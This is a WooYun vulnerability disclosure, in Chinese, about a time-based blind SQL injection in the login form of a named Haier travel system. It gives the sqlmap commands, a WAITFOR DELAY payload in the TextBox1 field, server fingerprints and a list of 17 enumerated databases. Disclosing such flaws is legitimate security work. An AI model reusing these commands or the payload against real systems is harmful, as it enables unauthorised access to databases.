WooYun.org

存在问题的系统：http://travel.haier.com:80/travel/manager/ReLogin.aspx
依然是登陆框，提交admin'，出现错误回显了：

爆物理路径了：

然后抓包保存到haier.txt到sqlmap里面去跑，（使用--data的方法跑不出来的，尝试了好多次都不行）。然后百度了一下用上面的方法来跑可以跑出来是注入点，但是跑不出来库，朋友说是网络问题？
然后等到早上网络比较好的时候再跑了一次，问题还是这样。。之前的语句是这样：
sqlmap.py -r haierpost.txt -p TextBox1 --tables --time-sec=20
--technique=T
后面各种尝试各种奇葩的SQLMAP的参数，最后把--tables改一下就成功了，真的蛋疼：
sqlmap.py -r haierpost.txt -p TextBox1 --dbs --time-sec=20 --
technique=T
话说--time-sec这个参数是什么用的？
然后就是盲注过程了，非常的漫长，结果：

总共17个数据库：
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: POST
Parameter: TextBox1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTI1MTQ3MzU2MWRkl28gi/VU56MiPf/1Ncc8lnwLALs=&__EVENTVALIDATION=/wEWBQKexuSzBALs0bLrBgLs0fbZDALs0Yq1BQLHyfnnAgb4y43LUN9z/MGbBAiXth1qXSO3&TextBox1=admin' WAITFOR DELAY '0:0:20'--&TextBox2=admin&TextBox3=5391&btLogin=%B5%C7%C2%BC
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [17]:
[*] [m\\?81xb]
[*] [tempdb߿]
[*] Back_Travel
[*] ExhibitionsManagement
[*] gobak
[*] GOPSf
[*] GOPSWGG
[*] lumigent
[*] master
[*] moda
[*] msdb
[*] mwdb
[*] PTMS
[*] SBCBFX
[*] Travel
[*] VioCard
[*] xiechengDB
我实在不想跑表了，太慢了。就这样了。